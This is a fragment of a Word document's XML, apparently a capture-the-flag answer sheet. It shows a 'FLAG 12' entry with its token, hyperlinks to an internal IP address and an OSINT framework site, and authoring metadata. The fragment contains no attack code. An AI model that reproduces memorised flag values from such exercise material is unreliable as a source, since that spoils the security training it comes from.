    <w:p w14:paraId="556DEDD7" w14:textId="4A3CFA2F" w:rsidR="00F47CF6" w:rsidRDefault="00F47CF6" w:rsidP="00F47C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FLAG 12: </w:t>
      </w:r>
      <w:r w:rsidR="00BE4359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d7sdfksdf384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BC83D1" w14:textId="73E5AAE2" w:rsidR="00F47CF6" w:rsidRDefault="00F47CF6" w:rsidP="00F47CF6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD9A7CC" w14:textId="77777777" w:rsidR="00F47CF6" w:rsidRPr="00F47CF6" w:rsidRDefault="00F47CF6" w:rsidP="00F47CF6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F47CF6" w:rsidRPr="00F47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F1718"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DAACA75A"/>
    <w:lvl w:ilvl="0" w:tplc="5EB25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57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9A"/>
    <w:rsid w:val="00062FFE"/>
    <w:rsid w:val="000E1BD2"/>
    <w:rsid w:val="000F6CBE"/>
    <w:rsid w:val="00152004"/>
    <w:rsid w:val="00244C59"/>
    <w:rsid w:val="002757F9"/>
    <w:rsid w:val="002B071A"/>
    <w:rsid w:val="002C5AAD"/>
    <w:rsid w:val="002C6384"/>
    <w:rsid w:val="003174B9"/>
    <w:rsid w:val="003F509F"/>
    <w:rsid w:val="00457311"/>
    <w:rsid w:val="004E2148"/>
    <w:rsid w:val="00543BB1"/>
    <w:rsid w:val="005D5634"/>
    <w:rsid w:val="00911EBD"/>
    <w:rsid w:val="00970E72"/>
    <w:rsid w:val="00AD1CDA"/>
    <w:rsid w:val="00BE4359"/>
    <w:rsid w:val="00BE5184"/>
    <w:rsid w:val="00C24DFE"/>
    <w:rsid w:val="00DE519A"/>
    <w:rsid w:val="00E44B9A"/>
    <w:rsid w:val="00EC4612"/>
    <w:rsid w:val="00F235A4"/>
    <w:rsid w:val="00F4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B7E4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D144A4A2-F0B0-4D07-A3C8-EC32C230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CE@192.168.13.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TALREKALL.XYZ" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="HTTPS://OSINTFRAMEWOR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Pang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tim Pang</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-24T02:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>